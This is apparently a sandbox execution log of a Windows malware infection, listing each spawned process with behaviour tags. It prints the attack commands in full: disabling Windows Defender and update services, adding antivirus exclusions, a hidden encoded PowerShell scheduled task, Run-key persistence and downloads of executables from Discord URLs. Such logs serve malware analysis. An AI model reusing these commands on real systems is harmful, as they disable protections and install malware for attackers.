C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True9⤵PID:6860
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"6⤵PID:6436
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:5648
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True8⤵PID:5724
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True9⤵PID:4032
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"6⤵PID:5520
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:5512
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True8⤵PID:5740
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True9⤵PID:4604
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"6⤵PID:1536
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:5212
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True8⤵PID:3092
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True9⤵PID:5528
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"5⤵PID:4156
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&6⤵PID:2536
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:327⤵PID:6596
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:647⤵PID:592
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"5⤵PID:4448
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&6⤵PID:2908
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:327⤵PID:6244
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:647⤵PID:6612
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gCnxIKkMy" /SC once /ST 11:57:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="5⤵
- Creates scheduled task(s)
PID:6356
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 13:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\GqKTDMf.exe\" uG /site_id 394347 /S" /V1 /F5⤵
- Creates scheduled task(s)
PID:3136
-
-
-
-
-
C:\Users\Admin\Documents\zb9d5srca1S85UfvPFnTAZJd.exe"C:\Users\Admin\Documents\zb9d5srca1S85UfvPFnTAZJd.exe"2⤵
- Executes dropped EXE
PID:3012 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3012 -s 2803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7052
-
-
-
C:\Users\Admin\Documents\HDnlha8KQxoi8bwvnS6xlPp4.exe"C:\Users\Admin\Documents\HDnlha8KQxoi8bwvnS6xlPp4.exe"2⤵
- Executes dropped EXE
PID:3560 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\136E.tmp\136F.tmp\1370.bat C:\Users\Admin\Documents\HDnlha8KQxoi8bwvnS6xlPp4.exe"3⤵PID:4060
-
C:\Users\Admin\AppData\Local\Temp\136E.tmp\136F.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\136E.tmp\136F.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/889574700513107980/890550701829259356/exe.exe" "exe.exe" "" "" "" "" "" ""4⤵PID:5796
-
-
C:\Users\Admin\AppData\Local\Temp\136E.tmp\136F.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\136E.tmp\136F.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/889574700513107980/892465432404054046/1.exe" "1.exe" "" "" "" "" "" ""4⤵
- Executes dropped EXE
PID:1436
-
-
C:\Users\Admin\AppData\Local\Temp\136E.tmp\136F.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\136E.tmp\136F.tmp\extd.exe "" "" "" "" "" "" "" "" ""4⤵PID:5852
-
-
C:\Users\Admin\AppData\Local\Temp\3185\1.exe1.exe4⤵
- Executes dropped EXE
PID:5140
-
-
-
-
C:\Users\Admin\Documents\2TUQ8CP6z7s4Vba1fkZDJJUU.exe"C:\Users\Admin\Documents\2TUQ8CP6z7s4Vba1fkZDJJUU.exe"2⤵PID:5244
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5244 -s 18803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4776
-
-
-
C:\Users\Admin\Documents\H6KBNe4YRhkCjXl_yzSBZb2I.exe"C:\Users\Admin\Documents\H6KBNe4YRhkCjXl_yzSBZb2I.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5092
-
-
C:\Users\Admin\Documents\rPRLfhZmwXu3oXGQaqju2XrO.exe"C:\Users\Admin\Documents\rPRLfhZmwXu3oXGQaqju2XrO.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:3200 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Documents\rPRLfhZmwXu3oXGQaqju2XrO.exe" & exit3⤵PID:3408
-
C:\Windows\SysWOW64\timeout.exetimeout /t 54⤵
- Delays execution with timeout.exe
PID:7064
-
-
-
-
C:\Users\Admin\Documents\byxb49tCEP1SdejWYr15WvcH.exe"C:\Users\Admin\Documents\byxb49tCEP1SdejWYr15WvcH.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5564
-
-
C:\Users\Admin\Documents\oKmnOrVPGDoDvSbzfd3Aw8I1.exe"C:\Users\Admin\Documents\oKmnOrVPGDoDvSbzfd3Aw8I1.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1868 -
C:\Users\Admin\AppData\Roaming\7725650.scr"C:\Users\Admin\AppData\Roaming\7725650.scr" /S3⤵
- Executes dropped EXE
PID:3060
-
-
C:\Users\Admin\AppData\Roaming\5030357.scr"C:\Users\Admin\AppData\Roaming\5030357.scr" /S3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2424 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
PID:3504
-
-
-
C:\Users\Admin\AppData\Roaming\3783178.scr"C:\Users\Admin\AppData\Roaming\3783178.scr" /S3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5828
-
-
C:\Users\Admin\AppData\Roaming\2841347.scr"C:\Users\Admin\AppData\Roaming\2841347.scr" /S3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5112
-
-
C:\Users\Admin\AppData\Roaming\5964929.scr"C:\Users\Admin\AppData\Roaming\5964929.scr" /S3⤵
- Executes dropped EXE
PID:1248
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3872 -ip 38721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4660
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4544 -ip 45441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5224
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1288 -ip 12881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5296
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
PID:3172
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:5616
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6104 -ip 61041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4212 -ip 42121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6088 -ip 60881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6040 -ip 60401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4024
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6028 -ip 60281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1756
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
PID:6000
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Executes dropped EXE
PID:5796
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5244 -ip 52441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6016
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 864 -ip 8641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6416
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3012 -ip 30121⤵PID:6796
-
C:\Users\Admin\AppData\Local\Temp\E804.exeC:\Users\Admin\AppData\Local\Temp\E804.exe1⤵PID:2824
-
C:\Users\Admin\AppData\Local\Temp\E804.exeC:\Users\Admin\AppData\Local\Temp\E804.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4588
-
-
C:\Users\Admin\AppData\Local\Temp\F42B.exeC:\Users\Admin\AppData\Local\Temp\F42B.exe1⤵PID:4276
-
C:\Users\Admin\AppData\Local\Temp\F42B.exeC:\Users\Admin\AppData\Local\Temp\F42B.exe2⤵PID:2044
-
-
C:\Users\Admin\AppData\Local\Temp\F42B.exeC:\Users\Admin\AppData\Local\Temp\F42B.exe2⤵PID:2392
-
-
C:\Users\Admin\AppData\Local\Temp\2F8F.exeC:\Users\Admin\AppData\Local\Temp\2F8F.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6036
-
C:\Users\Admin\AppData\Local\Temp\47DB.exeC:\Users\Admin\AppData\Local\Temp\47DB.exe1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:6880 -
C:\Users\Admin\AppData\Local\Temp\47DB.exe"C:\Users\Admin\AppData\Local\Temp\47DB.exe"2⤵PID:1180
-
-
C:\Users\Admin\AppData\Local\Temp\53E2.exeC:\Users\Admin\AppData\Local\Temp\53E2.exe1⤵PID:1252
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1252 -s 2962⤵
- Executes dropped EXE
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6028
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1252 -ip 12521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6664
-
C:\Users\Admin\AppData\Local\Temp\60E3.exeC:\Users\Admin\AppData\Local\Temp\60E3.exe1⤵PID:4452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 14242⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2672
-
-
C:\Users\Admin\AppData\Local\Temp\67D9.exeC:\Users\Admin\AppData\Local\Temp\67D9.exe1⤵PID:856
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 2642⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7160
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 856 -ip 8561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7092
-
C:\Users\Admin\AppData\Local\Temp\7893.exeC:\Users\Admin\AppData\Local\Temp\7893.exe1⤵PID:3132
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3132 -s 2642⤵
- Program crash
PID:4276
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 3240 -ip 32401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3008
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1084 -ip 10841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3268
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4968 -ip 49681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3316
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 3132 -ip 31321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5748
-
C:\Users\Admin\AppData\Local\Temp\9295.exeC:\Users\Admin\AppData\Local\Temp\9295.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5668
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4668 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:5884 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 4563⤵
- Program crash
- Enumerates system info in registry
PID:1612
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5884 -ip 58841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:452
-
C:\Users\Admin\AppData\Local\Temp\B1C6.exeC:\Users\Admin\AppData\Local\Temp\B1C6.exe1⤵PID:2216
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 2682⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4796
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4452 -ip 44521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2216 -ip 22161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1232
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 468 -p 6364 -ip 63641⤵PID:6020
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:3712 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding BE56B2DEBCC89975EEDEE121D6DE2102 C2⤵
- Loads dropped DLL
PID:2172
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 1D9000A54C00356DCA37BBBF16F332432⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:5772 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:4056
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4EB7BC6D8CEBC9912904D179EB02E4AF E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:4144
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4D7120E581943C9CC8F7E9CACDD1E3C3 C2⤵PID:14800
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A7F1B1503E8F185DBD4774D155E4A7CF2⤵PID:14972
-
-
C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management\disksyncer.exe"C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management\disksyncer.exe"2⤵
- Drops startup file
- Adds Run key to start application
PID:15200 -
C:\ProgramData\main_signed1\main_signed1.exe"C:\ProgramData\main_signed1\main_signed1.exe"3⤵PID:4636
-
C:\Users\Admin\AppData\Local\Temp\is-I1O9T.tmp\main_signed1.tmp"C:\Users\Admin\AppData\Local\Temp\is-I1O9T.tmp\main_signed1.tmp" /SL5="$1002D8,6001806,831488,C:\ProgramData\main_signed1\main_signed1.exe"4⤵PID:444
-
C:\ProgramData\main_signed1\main_signed1.exe"C:\ProgramData\main_signed1\main_signed1.exe" /VERYSILENT5⤵PID:16176
-
C:\Users\Admin\AppData\Local\Temp\is-9H0LA.tmp\main_signed1.tmp"C:\Users\Admin\AppData\Local\Temp\is-9H0LA.tmp\main_signed1.tmp" /SL5="$1102D8,6001806,831488,C:\ProgramData\main_signed1\main_signed1.exe" /VERYSILENT6⤵
- Suspicious use of FindShellTrayWindow
PID:6448 -
C:\Users\Admin\AppData\Roaming\Wondershare Studio\WSHelper.exe"C:\Users\Admin\AppData\Roaming\Wondershare Studio\WSHelper.exe"7⤵PID:1288
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1288 -s 6448⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:16232
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DebasedSeptenary_2021-09-28_19-42\DebasedSeptenary_2021-09-28_19-42.exe"C:\Users\Admin\AppData\Local\Temp\DebasedSeptenary_2021-09-28_19-42\DebasedSeptenary_2021-09-28_19-42.exe"3⤵PID:5152
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5152 -s 2924⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6640
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 16204 -ip 162041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 6128 -ip 61281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1088
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5724 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:4032 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5044
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4032 -ip 40321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3724
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:8072
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in Windows directory
PID:10976
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:11016
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:11004
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:13288
-
C:\Users\Admin\AppData\Local\Temp\1CCA.exeC:\Users\Admin\AppData\Local\Temp\1CCA.exe1⤵
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:13728 -
C:\Users\Admin\AppData\Local\Temp\066695cc-a53f-4927-b2e2-462ae31f141a\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\066695cc-a53f-4927-b2e2-462ae31f141a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\066695cc-a53f-4927-b2e2-462ae31f141a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵PID:13836
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\066695cc-a53f-4927-b2e2-462ae31f141a\test.bat"3⤵PID:13904
-
C:\Windows\system32\sc.exesc stop windefend4⤵PID:13952
-
-
C:\Windows\system32\sc.exesc config windefend start= disabled4⤵PID:13972
-
-
C:\Windows\system32\sc.exesc stop Sense4⤵PID:13988
-
-
C:\Windows\system32\sc.exesc config Sense start= disabled4⤵PID:14004
-
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵PID:14020
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled4⤵PID:14036
-
-
C:\Windows\system32\sc.exesc stop usosvc4⤵PID:14048
-
-
C:\Windows\system32\sc.exesc config usosvc start= disabled4⤵PID:14064
-
-
C:\Windows\system32\sc.exesc stop WaasMedicSvc4⤵PID:14080
-
-
C:\Windows\system32\sc.exesc config WaasMedicSvc start= disabled4⤵PID:14096
-
-
C:\Windows\system32\sc.exesc stop SecurityHealthService4⤵PID:14112
-
-
C:\Windows\system32\sc.exesc config SecurityHealthService start= disabled4⤵PID:14128
-
-
C:\Windows\system32\sc.exesc stop SDRSVC4⤵PID:14144
-
-
C:\Windows\system32\sc.exesc config SDRSVC start= disabled4⤵PID:14160
-
-
C:\Windows\system32\sc.exesc stop wscsvc4⤵PID:14176
-
-
C:\Windows\system32\sc.exesc config wscsvc start= disabled4⤵PID:14208
-
-
C:\Windows\system32\sc.exesc stop WdiServiceHost4⤵PID:14224
-
-
C:\Windows\system32\sc.exesc config WdiServiceHost start= disabled4⤵PID:14240
-
-
C:\Windows\system32\sc.exesc stop WdiSystemHost4⤵PID:14256
-
-
C:\Windows\system32\sc.exesc config WdiSystemHost start= disabled4⤵PID:14272
-
-
C:\Windows\system32\sc.exesc stop InstallService4⤵PID:14288
-
-
C:\Windows\system32\sc.exesc config InstallService Start= disabled4⤵PID:14304
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1CCA.exe" -Force2⤵PID:14332
-
-
C:\Users\Admin\AppData\Local\Temp\1CCA.exe"C:\Users\Admin\AppData\Local\Temp\1CCA.exe"2⤵PID:14344
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13728 -s 24482⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:14532
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 13728 -ip 137281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:14488
-
C:\Users\Admin\AppData\Local\Temp\3C3A.exeC:\Users\Admin\AppData\Local\Temp\3C3A.exe1⤵
- Enumerates connected drives
PID:14712 -
